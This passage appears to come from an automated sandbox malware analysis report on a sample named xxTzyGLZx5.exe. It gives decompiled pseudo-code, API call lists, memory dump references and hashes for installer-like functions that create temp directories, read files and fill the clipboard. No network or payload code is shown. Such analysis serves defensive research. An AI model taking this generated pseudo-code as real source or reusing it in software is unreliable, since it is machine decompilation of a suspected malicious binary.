                                                                                                0x004015c2
                                                                                                0x004015c6
                                                                                                0x004015c8
                                                                                                0x004015d0
                                                                                                0x004015d6
                                                                                                0x004015d8
                                                                                                0x004015db
                                                                                                0x004015e3
                                                                                                0x004015f0
                                                                                                0x004015fd
                                                                                                0x004015fd
                                                                                                0x004015f2
                                                                                                0x004015f3
                                                                                                0x004015fb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004015fb
                                                                                                0x004015f0
                                                                                                0x00401600
                                                                                                0x00401603
                                                                                                0x00401605
                                                                                                0x00401606
                                                                                                0x004015c8
                                                                                                0x0040160d
                                                                                                0x0040162d
                                                                                                0x00402156
                                                                                                0x0040160f
                                                                                                0x00401611
                                                                                                0x0040161c
                                                                                                0x00401622
                                                                                                0x00401622
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                  • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004054C0
                                                                                                  • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                                                                                  • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                                                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                • API String ID: 3751793516-47812868
                                                                                                • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                                                                • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                                                                                                • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                                                                • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405631, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                0x00405635
                                                                                                0x0040563b
                                                                                                0x0040563c
                                                                                                0x0040563c
                                                                                                0x0040563d
                                                                                                0x00405644
                                                                                                0x0040564e
                                                                                                0x0040565b
                                                                                                0x0040565e
                                                                                                0x00405666
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040566a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040566c
                                                                                                0x00000000
                                                                                                0x0040566c
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00405644
                                                                                                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040565E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                • API String ID: 1716503409-3468531726
                                                                                                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                                                                                                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC2000, Relevance: 7.7, APIs: 5, Instructions: 178fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EDC296D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: f239004ddc35d2f836f68407aa07f08af9ef5c1eec1bc132619eb1f8de5f5f83
                                                                                                • Instruction ID: fc72ba373e7b5b6fc1d19f863d08a65151f9d29a684bf11f4d5c93a962724f22
                                                                                                • Opcode Fuzzy Hash: f239004ddc35d2f836f68407aa07f08af9ef5c1eec1bc132619eb1f8de5f5f83
                                                                                                • Instruction Fuzzy Hash: C4612935E50208EADB50DBE4E951BEDB7B9BF48B54F205416E514EB2E0EB700E40DB16
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004030AF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E004030AF(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405B89(_t6);
				_t2 = E0040548B(_t6);
				if(_t2 != 0) {
					E0040541E(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405631("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                0x004030b0
                                                                                                0x004030b6
                                                                                                0x004030bc
                                                                                                0x004030c3
                                                                                                0x004030c8
                                                                                                0x004030d0
                                                                                                0x004030dc
                                                                                                0x004030e2
                                                                                                0x004030c6
                                                                                                0x004030c6
                                                                                                0x004030c6

                                                                                                APIs
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                  • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 4115351271-517883005
                                                                                                • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                                                                • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                                                                                • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                                                                • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 69%
                                                                                                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42eb90; // 0x600004
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e34c =  *0x42e34c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
					}
				}
				return 0;
			}












                                                                                                0x0040138a
                                                                                                0x004013fa
                                                                                                0x00401392
                                                                                                0x0040139b
                                                                                                0x004013a0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004013a2
                                                                                                0x004013a3
                                                                                                0x004013ad
                                                                                                0x00000000
                                                                                                0x00401404
                                                                                                0x004013b0
                                                                                                0x004013b7
                                                                                                0x004013bd
                                                                                                0x004013be
                                                                                                0x004013c0
                                                                                                0x004013c2
                                                                                                0x004013b9
                                                                                                0x004013b9
                                                                                                0x004013ba
                                                                                                0x004013ba
                                                                                                0x004013c9
                                                                                                0x004013cb
                                                                                                0x004013f4
                                                                                                0x004013f4
                                                                                                0x004013c9
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                                                                • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                                                                                • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                                                                • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405602, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E00405602(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                0x00405606
                                                                                                0x00405613
                                                                                                0x00405628
                                                                                                0x0040562e

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 00405606
                                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                                • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004055E3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E004055E3(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                                0x004055e7
                                                                                                0x004055f0
                                                                                                0x00000000
                                                                                                0x004055f9
                                                                                                0x004055ff

                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(?,004053EE,?,?,?), ref: 004055E7
                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                                                                                • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00403066, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00403066(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                0x0040306a
                                                                                                0x0040307d
                                                                                                0x00403085
                                                                                                0x00000000
                                                                                                0x0040308c
                                                                                                0x00000000
                                                                                                0x0040308e

                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                                • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                                                                                • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                                • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00403098, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00403098(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                0x004030a6
                                                                                                0x004030ac

                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DD2,00032FE4), ref: 004030A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                                • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                                                                                • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                                • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 00404E07, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e344; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x429fd8;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e32c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42eb68, 8);
							__eflags =  *0x42ebec - _t149; // 0x0
							if(__eflags == 0) {
								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
							}
							E00403CB6(1);
							goto L25;
						}
						 *0x4293a0 = 2;
						E00403CB6(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403D44(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e330, _t149);
						ShowWindow(_t154, 8);
						E00403D12(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42eb70; // 0x5ff628
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e330 = GetDlgItem(_a4, 0x403);
				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e344 = _t127;
				_v8 = _t127;
				E00403D12( *0x42e330);
				 *0x42e334 = E0040456B(4);
				 *0x42e34c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403CDD(_a4);
				if(( *0x42eb78 & 0x00000003) != 0) {
					ShowWindow( *0x42e330, _t149);
					if(( *0x42eb78 & 0x00000002) != 0) {
						 *0x42e330 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403D12( *0x42e328);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42eb78 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                                                                0x00404e10
                                                                                                0x00404e16
                                                                                                0x00404e1f
                                                                                                0x00404e22
                                                                                                0x00404fb3
                                                                                                0x00404fba
                                                                                                0x00404fde
                                                                                                0x00404fde
                                                                                                0x00404fe4
                                                                                                0x00404ff1
                                                                                                0x0040500f
                                                                                                0x0040500f
                                                                                                0x00405016
                                                                                                0x0040506d
                                                                                                0x0040506d
                                                                                                0x00405071
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405073
                                                                                                0x00405076
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405080
                                                                                                0x00405086
                                                                                                0x00405088
                                                                                                0x0040508b
                                                                                                0x00405184
                                                                                                0x00000000
                                                                                                0x00405184
                                                                                                0x0040509a
                                                                                                0x004050a6
                                                                                                0x004050ac
                                                                                                0x004050af
                                                                                                0x004050b2
                                                                                                0x004050c7
                                                                                                0x004050ca
                                                                                                0x004050ca
                                                                                                0x004050cd
                                                                                                0x004050b4
